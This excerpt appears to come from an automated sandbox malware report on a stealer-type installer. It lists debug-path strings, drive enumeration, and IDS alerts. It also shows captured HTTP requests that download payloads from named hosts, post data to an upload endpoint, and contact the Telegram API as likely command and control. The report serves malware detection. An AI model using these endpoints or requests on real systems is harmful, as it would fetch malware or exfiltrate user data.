    Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: MainSoftware.exe, 00000010.00000002.2140691802.00000275352BE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141123759.0000027535751000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Ping\Release\net8.0-windows\System.Net.Ping.pdbSHA256S source: MainSoftware.exe, 00000010.00000002.2141897499.0000027536210000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net8.0\System.Memory.pdb source: MainSoftware.exe, 00000010.00000002.2152351430.000002753B451000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151993346.000002753B43C000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/netstandard/Release/net8.0-windows/netstandard.pdb source: MainSoftware.exe, 00000010.00000002.2141619079.0000027536038000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141673495.0000027536061000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdbp source: 1.exe, 00000004.00000003.1315095135.0000000009710000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: 1.exe, 1.exe, 00000004.00000002.2258821783.0000000000B1B000.00000002.00000001.01000000.00000004.sdmp, 1.exe, 00000004.00000000.1278293993.0000000000B1B000.00000002.00000001.01000000.00000004.sdmp, 1.exe, 0000000B.00000002.2228034287.0000000000B1B000.00000002.00000001.01000000.00000004.sdmp, 1.exe, 0000000B.00000000.1506124351.0000000000B1B000.00000002.00000001.01000000.00000004.sdmp
    Source: Binary string: System.Net.NameResolution.ni.pdb source: MainSoftware.exe, 00000010.00000002.2150696251.000002753B381000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2150453848.000002753B36D000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Claims\Release\net8.0\System.Security.Claims.pdb source: MainSoftware.exe, 00000010.00000002.2151555653.000002753B3F7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151813644.000002753B411000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Diagnostics.DiagnosticSource.ni.pdb source: MainSoftware.exe, 00000010.00000002.2142461937.0000027537EE1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142367623.0000027537EB3000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Numerics.Vectors\Release\net8.0\System.Numerics.Vectors.pdb source: MainSoftware.exe, 00000010.00000002.2143681745.00000275384E1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143619192.00000275384DC000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Threading.ni.pdb source: MainSoftware.exe, 00000010.00000002.2139484867.000002349EBE1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142756269.000002753814B000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Net/Release/net8.0-windows/System.Net.pdb source: MainSoftware.exe, 00000010.00000002.2143619192.00000275384D7000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/src/Serilog.Sinks.Http/obj/Release/netstandard2.1/Serilog.Sinks.Http.pdb source: MainSoftware.exe, 00000010.00000002.2141601509.0000027536021000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141547348.0000027536009000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\Users\Admin\Distributor\Bundle Project\MSIInstaller\obj\Release\net8.0\win-x64\linked\MSIInstaller.pdb source: 1.exe, 00000004.00000003.1588667153.000000000C542000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net8.0\System.Runtime.InteropServices.pdb source: MainSoftware.exe, 00000010.00000002.2143143857.00000275382D1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143093774.00000275382B5000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Numerics/Release/net8.0-windows/System.Numerics.pdb source: MainSoftware.exe, 00000010.00000002.2140691802.00000275352B0000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.AppContext/Release/net8.0-windows/System.AppContext.pdbSHA256 source: MainSoftware.exe, 00000010.00000002.2143697931.00000275384F5000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.EventBasedAsync\Release\net8.0\System.ComponentModel.EventBasedAsync.pdb source: MainSoftware.exe, 00000010.00000002.2142971155.0000027538262000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.NetworkInformation.ni.pdb source: MainSoftware.exe, 00000010.00000002.2152851564.000002753B481000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2152469734.000002753B46A000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000015.00000002.2261226768.000002BDD0B11000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: #.Pdb source: 1.exe, 00000004.00000003.1588667153.000000000D14D000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000002.2143996373.0000027538601000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: wininet.pdb source: 1.exe, 00000004.00000003.1321424870.0000000009918000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517432545.000000000744C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Text.Encodings.Web.ni.pdb source: MainSoftware.exe, 00000010.00000002.2143527590.0000027538491000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143445237.000002753847A000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ShortcutFlags.pdb source: 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: System.Collections.Concurrent.ni.pdb source: MainSoftware.exe, 00000010.00000002.2143697931.00000275384FD000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143781631.0000027538521000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Diagnostics.Process.ni.pdb source: MainSoftware.exe, 00000010.00000002.2142891564.0000027538203000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142946137.0000027538231000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.ComponentModel.Primitives.ni.pdb source: MainSoftware.exe, 00000010.00000002.2142971155.0000027538269000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143023677.0000027538281000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NetworkInformation\Release\net8.0-windows\System.Net.NetworkInformation.pdb source: MainSoftware.exe, 00000010.00000002.2152851564.000002753B481000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2152469734.000002753B46A000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000015.00000002.2261226768.000002BDD0B11000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Private.Uri.ni.pdb source: MainSoftware.exe, 00000010.00000002.2142815364.0000027538167000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142869783.0000027538191000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections\Release\net8.0\System.Collections.pdb source: MainSoftware.exe, 00000010.00000002.2139962633.000002349EDC9000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2139926749.000002349ED91000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Text.Encoding/Release/net8.0-windows/System.Text.Encoding.pdb source: MainSoftware.exe, 00000010.00000002.2143445237.0000027538476000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\FileOperations.pdb source: 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: 1.exe, 00000004.00000003.1588667153.000000000C3C1000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, MainSoftware.exe, 00000010.00000002.2167406026.00007FF7D9618000.00000002.00000001.01000000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Registry\Release\net8.0-windows\Microsoft.Win32.Registry.pdb source: MainSoftware.exe, 00000010.00000002.2143232066.0000027538317000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143295395.0000027538331000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdbSHA256 source: MainSoftware.exe, 00000010.00000002.2142559459.0000027537F61000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142488273.0000027537F19000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdb source: MainSoftware.exe, 00000010.00000002.2142461937.0000027537EE1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142367623.0000027537EB3000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Collections.NonGeneric.ni.pdb source: MainSoftware.exe, 00000010.00000002.2143077066.00000275382A1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143041301.0000027538291000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Threading.Timer/Release/net8.0-windows/System.Threading.Timer.pdb source: MainSoftware.exe, 00000010.00000002.2142756269.0000027538147000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: MainSoftware.exe, 00000010.00000002.2142891564.0000027538203000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142946137.0000027538231000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Diagnostics.Debug/Release/net8.0-windows/System.Diagnostics.Debug.pdb source: MainSoftware.exe, 00000010.00000002.2142367623.0000027537EB0000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdb source: MainSoftware.exe, 00000010.00000002.2143935572.00000275385E2000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143966375.00000275385F1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Memory.ni.pdb source: MainSoftware.exe, 00000010.00000002.2152351430.000002753B451000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151993346.000002753B43C000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdb source: MainSoftware.exe, 00000010.00000002.2143876894.00000275385C3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143920191.00000275385D1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/Microsoft.Extensions.Configuration.Abstractions/Release/net7.0/Microsoft.Extensions.Configuration.Abstractions.pdb source: MainSoftware.exe, 00000010.00000002.2141698149.0000027536080000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141733839.00000275360A1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdb source: MainSoftware.exe, 00000010.00000002.2150780721.000002753B393000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151073254.000002753B3A1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/src/Serilog.Formatting.Compact/obj/Release/net8.0/Serilog.Formatting.Compact.pdb source: MainSoftware.exe, 00000010.00000002.2141475912.0000027535FE8000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141529603.0000027535FF1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net8.0\System.Text.Encoding.Extensions.pdbSHA2560 source: MainSoftware.exe, 00000010.00000002.2143445237.0000027538472000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdb source: MainSoftware.exe, 00000010.00000002.2142559459.0000027537F61000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142488273.0000027537F19000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ShortcutFlags.pdbG source: 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: System.Security.Cryptography.ni.pdb source: MainSoftware.exe, 00000010.00000002.2142592762.0000027537FB6000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142689155.0000027538081000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.AppContext/Release/net8.0-windows/System.AppContext.pdb source: MainSoftware.exe, 00000010.00000002.2143697931.00000275384F5000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http.Json\Release\net8.0\System.Net.Http.Json.pdb source: MainSoftware.exe, 00000010.00000002.2143160448.00000275382EA000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143209931.0000027538301000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Runtime.InteropServices.ni.pdb source: MainSoftware.exe, 00000010.00000002.2143143857.00000275382D1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143093774.00000275382B5000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdbSHA256R source: MainSoftware.exe, 00000010.00000002.2140001032.000002349EDF3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2140127974.00000234A06D1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/Microsoft.Extensions.Primitives/Release/net7.0/Microsoft.Extensions.Primitives.pdb source: MainSoftware.exe, 00000010.00000002.2140154271.00000234A0702000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000000.2065212179.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2167112591.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encodings.Web\Release\net8.0\System.Text.Encodings.Web.pdb source: MainSoftware.exe, 00000010.00000002.2143527590.0000027538491000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143445237.000002753847A000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdb source: MainSoftware.exe, 00000010.00000002.2141840198.0000027536161000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141751848.00000275360B8000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.Primitives\Release\net8.0\System.ComponentModel.Primitives.pdb source: MainSoftware.exe, 00000010.00000002.2142971155.0000027538269000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143023677.0000027538281000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Sockets\Release\net8.0-windows\System.Net.Sockets.pdb source: MainSoftware.exe, 00000010.00000002.2143851076.0000027538581000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143804192.0000027538541000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Intrinsics\Release\net8.0\System.Runtime.Intrinsics.pdb source: MainSoftware.exe, 00000010.00000002.2143603521.00000275384C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143558064.00000275384B4000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000015.00000002.2261349602.000002BDD0C71000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Http.ni.pdb source: MainSoftware.exe, 00000010.00000002.2141840198.0000027536161000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141751848.00000275360B8000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdb source: MainSoftware.exe, 00000010.00000002.2139801818.000002349ED73000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2139872986.000002349ED81000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Buffers/Release/net8.0-windows/System.Buffers.pdb source: MainSoftware.exe, 00000010.00000002.2143697931.00000275384F9000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdb source: 1.exe, 00000004.00000003.1315095135.0000000009710000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net8.0\System.Text.Encoding.Extensions.pdb source: MainSoftware.exe, 00000010.00000002.2143445237.0000027538472000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: 1.exe, 00000004.00000003.1315095135.0000000009710000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Principal.Windows\Release\net8.0-windows\System.Security.Principal.Windows.pdb source: MainSoftware.exe, 00000010.00000002.2151399807.000002753B3D1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151185629.000002753B3B1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdbSHA2560 source: MainSoftware.exe, 00000010.00000002.2150780721.000002753B393000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151073254.000002753B3A1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Primitives.ni.pdb source: MainSoftware.exe, 00000010.00000002.2141954837.0000027536241000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141897499.000002753621B000.00000002.00000001.00040000.0000000A.sdmp
    Source: C:\Users\user\Desktop\1.exeFile opened: z:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: x:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: v:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: t:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: r:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: p:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: n:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: l:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: j:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: h:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: f:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: b:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: y:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: w:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: u:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: s:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: q:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: o:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: m:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: k:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: i:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: g:Jump to behavior
    Source: C:\Users\user\Desktop\1.exeFile opened: e:Jump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeFile opened: c:
    Source: C:\Users\user\Desktop\1.exeFile opened: a:Jump to behavior
    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_009B5800 FindFirstFileW,GetLastError,FindClose,11_2_009B5800
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_00873CB0 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,11_2_00873CB0
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_008931C0 GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLastError,11_2_008931C0
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2829202 - Severity 1 - ETPRO MALWARE MSIL/Zbrain PUP/Stealer Installer UA : 192.168.2.5:49701 -> 104.21.80.136:443
    Source: Network trafficSuricata IDS: 2829202 - Severity 1 - ETPRO MALWARE MSIL/Zbrain PUP/Stealer Installer UA : 192.168.2.5:49703 -> 104.21.80.136:443
    System process connects to network (likely due to code injection or exploit)
    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 149.154.167.220 443
    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 172.67.184.211 443
    Uses the Telegram API (likely for C&C communication)
    Source: unknownDNS query: name: api.telegram.org
    Source: global trafficHTTP traffic detected: POST /install/new HTTP/1.1Host: jonatechlab.comX-API-Key: 123e4567-e89b-12d3-a456-426614174000Transfer-Encoding: chunkedContent-Type: application/json; charset=utf-8
    Source: global trafficHTTP traffic detected: GET /install/whattoinstall/4c2d4fd1-9d88-4973-a75e-9b3ee4edf911 HTTP/1.1Host: jonatechlab.comX-API-Key: 123e4567-e89b-12d3-a456-426614174000
    Source: global trafficHTTP traffic detected: POST /logs/telemetry HTTP/1.1Host: jonatechlab.comContent-Type: application/jsonContent-Length: 660
    Source: global trafficHTTP traffic detected: POST /logs/telemetry HTTP/1.1Host: jonatechlab.comContent-Type: application/jsonContent-Length: 133
    Source: global trafficHTTP traffic detected: POST /logs/telemetry HTTP/1.1Host: jonatechlab.comContent-Type: application/jsonContent-Length: 172
    Source: global trafficHTTP traffic detected: GET /install/getfiles/Chop/Install.exe HTTP/1.1Host: jonatechlab.comX-API-Key: 123e4567-e89b-12d3-a456-426614174000
    Source: global trafficHTTP traffic detected: GET /install/getfiles/Chop/Chop.pkg HTTP/1.1Host: jonatechlab.comX-API-Key: 123e4567-e89b-12d3-a456-426614174000
    Source: global trafficHTTP traffic detected: POST /logs/telemetry HTTP/1.1Host: swiftvantage.onlineContent-Type: application/jsonContent-Length: 1338
    Source: global trafficHTTP traffic detected: POST /logs/telemetry HTTP/1.1Host: jonatechlab.comContent-Type: application/jsonContent-Length: 375
    Source: global trafficHTTP traffic detected: POST /uplo.php HTTP/1.1Host: wetransfers.ioAccept: */*Content-Length: 898Content-Type: multipart/form-data; boundary=------------------------Iv7PtROXsQsuvFVbIKIWnT
    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
    Source: Joe Sandbox ViewIP Address: 172.67.184.211 172.67.184.211
    Source: Joe Sandbox ViewIP Address: 104.21.80.136 104.21.80.136
    Source: Joe Sandbox ViewJA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
    Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /tools/files/dc657fbe-5659-47ad-b5f6-05fa4c901173/msi/Install.exe HTTP/1.1Accept: */*User-Agent: AdvancedInstallerHost: swiftvantage.onlineConnection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /tools/files/dc657fbe-5659-47ad-b5f6-05fa4c901173/msi/Surfclub.pkg HTTP/1.1Accept: */*User-Agent: AdvancedInstallerHost: swiftvantage.onlineConnection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /install/whattoinstall/4c2d4fd1-9d88-4973-a75e-9b3ee4edf911 HTTP/1.1Host: jonatechlab.comX-API-Key: 123e4567-e89b-12d3-a456-426614174000
    Source: global trafficHTTP traffic detected: GET /install/getfiles/Chop/Install.exe HTTP/1.1Host: jonatechlab.comX-API-Key: 123e4567-e89b-12d3-a456-426614174000
    Source: global trafficHTTP traffic detected: GET /install/getfiles/Chop/Chop.pkg HTTP/1.1Host: jonatechlab.comX-API-Key: 123e4567-e89b-12d3-a456-426614174000
    Source: global trafficHTTP traffic detected: GET /v.php HTTP/1.1Host: wetransfers.ioUser-Agent: curl/7.83.1Accept: */*
    Source: global trafficDNS traffic detected: DNS query: swiftvantage.online
    Source: global trafficDNS traffic detected: DNS query: jonatechlab.com
    Source: global trafficDNS traffic detected: DNS query: wetransfers.io
    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
    Source: unknownHTTP traffic detected: POST /install/new HTTP/1.1Host: jonatechlab.comX-API-Key: 123e4567-e89b-12d3-a456-426614174000Transfer-Encoding: chunkedContent-Type: application/json; charset=utf-8
    Source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000000.2065212179.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2167112591.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://.css
    Source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000000.2065212179.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2167112591.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://.jpg
    Source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
    Source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0
    Source: 1.exe, 00000004.00000002.2261284310.0000000008180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.co
